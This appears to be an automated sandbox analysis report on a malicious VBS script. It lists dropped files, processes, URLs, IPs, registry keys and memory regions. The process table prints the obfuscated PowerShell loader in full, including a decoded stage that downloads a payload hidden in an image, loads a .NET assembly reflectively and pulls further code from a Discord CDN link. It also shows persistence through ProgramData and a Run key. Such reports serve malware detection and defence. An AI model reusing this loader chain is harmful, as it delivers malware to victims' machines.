Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
upload.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\cognitivo.vbs
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vm93m[1].txt
|
ASCII text, with very long lines (13472), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3b35xjcl.eyn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azy2mhei.afa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndinhs5s.lrk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbc0m2m5.sa2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xirwn2ws.ulq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzlt0ymo.j2n.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreODgTreDgTreyDgTreDEDgTreZQBjDgTreGEDgTreMQDgTrewDgTreDYDgTreOQDgTre3DgTreGEDgTreMDgTreBjDgTreDYDgTreNwBkDgTreGYDgTreMgBlDgTreDYDgTreNwBiDgTreGUDgTreZgDgTre3DgTreDQDgTreZQDgTre5DgTreDgDgTreODgTreDgTreyDgTreDYDgTreMDgTreDgTrezDgTreDgDgTreNQDgTre3DgTreGUDgTreYQDgTre0DgTreDUDgTreODgTreBmDgTreGYDgTreOQDgTre1DgTreDkDgTreZDgTreBhDgTreGEDgTreYwDgTrewDgTreDYDgTreYwBlDgTreGYDgTreMQBlDgTreDDgTreDgTreZgDgTre0DgTreDIDgTreZQDgTre9DgTreG0DgTreaDgTreDgTremDgTreGQDgTreZQDgTrewDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGQDgTreNgDgTreyDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTreZDgTreBhDgTreG8DgTrebDgTreBwDgTreHUDgTreLwDgTreyDgTreDYDgTreMwDgTre3DgTreDgDgTreOQDgTrexDgTreDMDgTreMDgTreDgTrezDgTreDEDgTreNQDgTre5DgTreDEDgTreNgDgTrezDgTreDQDgTreMgDgTrexDgTreC8DgTreMwDgTre0DgTreDYDgTreMQDgTre5DgTreDEDgTreMQDgTrexDgTreDUDgTreMwDgTreyDgTreDDgTreDgTreNwDgTreyDgTreDYDgTreNQDgTrezDgTreDIDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGMDgTrebwBnDgTreG4DgTreaQB0DgTreGkDgTredgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634',
'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth'
, '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
|
188.114.97.3
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://paste.ee/d/Vm93m
|
188.114.97.3
|
|
|
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://paste.ee/
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://paste.ee/d/Vm93m/(
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://uploaddeimagens.com.br
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://cdn.discordapp.com/attachments/1235627023511191643/1243619513031987362/upload.txt?ex=6652226d&is=6650d0ed&hm=e24f0e1fec60caad959ff854ae7583062889e47feb76e2fd76c0a79601ace128&
|
162.159.135.233
|
||
|
https://www.google.com
|
unknown
|
||
|
https://paste.ee/d/Vm93mll
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
uploaddeimagens.com.br
|
188.114.97.3
|
|
|
|
198.187.3.20.in-addr.arpa
|
unknown
|
|
|
|
cdn.discordapp.com
|
162.159.135.233
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
162.159.135.233
|
cdn.discordapp.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
21F669B0000
|
heap
|
page read and write
|
||
|
21F63E8E000
|
heap
|
page read and write
|
||
|
21F63EA5000
|
heap
|
page read and write
|
||
|
21F65C14000
|
heap
|
page read and write
|
||
|
15D3EAE2000
|
heap
|
page read and write
|
||
|
286FDE35000
|
heap
|
page read and write
|
||
|
7FF848C1B000
|
trusted library allocation
|
page read and write
|
||
|
15D3EB91000
|
heap
|
page read and write
|
||
|
7294FE000
|
stack
|
page read and write
|
||
|
26D8D1F0000
|
heap
|
page read and write
|
||
|
21F65C0D000
|
heap
|
page read and write
|
||
|
1F97B8CC000
|
heap
|
page read and write
|
||
|
1F97D70E000
|
heap
|
page read and write
|
||
|
21F63DE0000
|
heap
|
page read and write
|
||
|
1F97B898000
|
heap
|
page read and write
|
||
|
21F63E14000
|
heap
|
page read and write
|
||
|
21F669BA000
|
heap
|
page read and write
|
||
|
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
|
1F97D2E0000
|
heap
|
page read and write
|
||
|
1F97D6ED000
|
heap
|
page read and write
|
||
|
26D8B765000
|
heap
|
page read and write
|
||
|
26D89820000
|
heap
|
page read and write
|
||
|
245A145B000
|
trusted library allocation
|
page read and write
|
||
|
21F6605B000
|
heap
|
page read and write
|
||
|
1F97B88E000
|
heap
|
page read and write
|
||
|
21F63E90000
|
heap
|
page read and write
|
||
|
21F65C9B000
|
heap
|
page read and write
|
||
|
26D8B6CF000
|
heap
|
page read and write
|
||
|
15D271E9000
|
trusted library allocation
|
page read and write
|
||
|
15D26C19000
|
trusted library allocation
|
page read and write
|
||
|
245B1071000
|
trusted library allocation
|
page read and write
|
||
|
1F97D687000
|
heap
|
page read and write
|
||
|
15D26ACF000
|
trusted library allocation
|
page read and write
|
||
|
5701BFE000
|
stack
|
page read and write
|
||
|
21F65FA4000
|
heap
|
page read and write
|
||
|
21F65C01000
|
heap
|
page read and write
|
||
|
26D8B77F000
|
heap
|
page read and write
|
||
|
21F65C23000
|
heap
|
page read and write
|
||
|
1F97D693000
|
heap
|
page read and write
|
||
|
26D89770000
|
heap
|
page read and write
|
||
|
15D270C9000
|
trusted library allocation
|
page read and write
|
||
|
286E57B0000
|
trusted library allocation
|
page read and write
|
||
|
21F63E8E000
|
heap
|
page read and write
|
||
|
286E5FD8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
|
1F97D66C000
|
heap
|
page read and write
|
||
|
1F97D671000
|
heap
|
page read and write
|
||
|
15D26C09000
|
trusted library allocation
|
page read and write
|
||
|
2459F087000
|
heap
|
page read and write
|
||
|
15D24AE0000
|
heap
|
page read and write
|
||
|
7FF848DC2000
|
trusted library allocation
|
page read and write
|
||
|
286FE05F000
|
heap
|
page read and write
|
||
|
1F97B931000
|
heap
|
page read and write
|
||
|
26D897A9000
|
heap
|
page read and write
|
||
|
26D8B340000
|
heap
|
page read and write
|
||
|
21F65C14000
|
heap
|
page read and write
|
||
|
1F97D687000
|
heap
|
page read and write
|
||
|
26D8B6E3000
|
heap
|
page read and write
|
||
|
286FDF20000
|
heap
|
page read and write
|
||
|
21F666A7000
|
heap
|
page read and write
|
||
|
21F65FB7000
|
heap
|
page read and write
|
||
|
286E3F01000
|
heap
|
page read and write
|
||
|
1F97D6E5000
|
heap
|
page read and write
|
||
|
15D26EC4000
|
trusted library allocation
|
page read and write
|
||
|
15D271D0000
|
trusted library allocation
|
page read and write
|
||
|
21F65C08000
|
heap
|
page read and write
|
||
|
1F97B8B0000
|
heap
|
page read and write
|
||
|
7FF848BE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
15D26F53000
|
trusted library allocation
|
page read and write
|
||
|
21F669AC000
|
heap
|
page read and write
|
||
|
245A09D0000
|
trusted library allocation
|
page read and write
|
||
|
15D24CAE000
|
heap
|
page read and write
|
||
|
26D8B71E000
|
heap
|
page read and write
|
||
|
3A3B3FD000
|
stack
|
page read and write
|
||
|
2459F048000
|
heap
|
page read and write
|
||
|
1F97B88C000
|
heap
|
page read and write
|
||
|
8868F9F000
|
stack
|
page read and write
|
||
|
1F97B8BE000
|
heap
|
page read and write
|
||
|
21F63CD0000
|
heap
|
page read and write
|
||
|
3A3B2FE000
|
stack
|
page read and write
|
||
|
1F97D664000
|
heap
|
page read and write
|
||
|
286F5C61000
|
trusted library allocation
|
page read and write
|
||
|
286FDF00000
|
heap
|
page read and write
|
||
|
26D8D1F5000
|
heap
|
page read and write
|
||
|
26D898CF000
|
heap
|
page read and write
|
||
|
AF3B8FF000
|
stack
|
page read and write
|
||
|
21F666DE000
|
heap
|
page read and write
|
||
|
286E5DBB000
|
trusted library allocation
|
page read and write
|
||
|
1F97D67C000
|
heap
|
page read and write
|
||
|
1F97D676000
|
heap
|
page read and write
|
||
|
286E5C77000
|
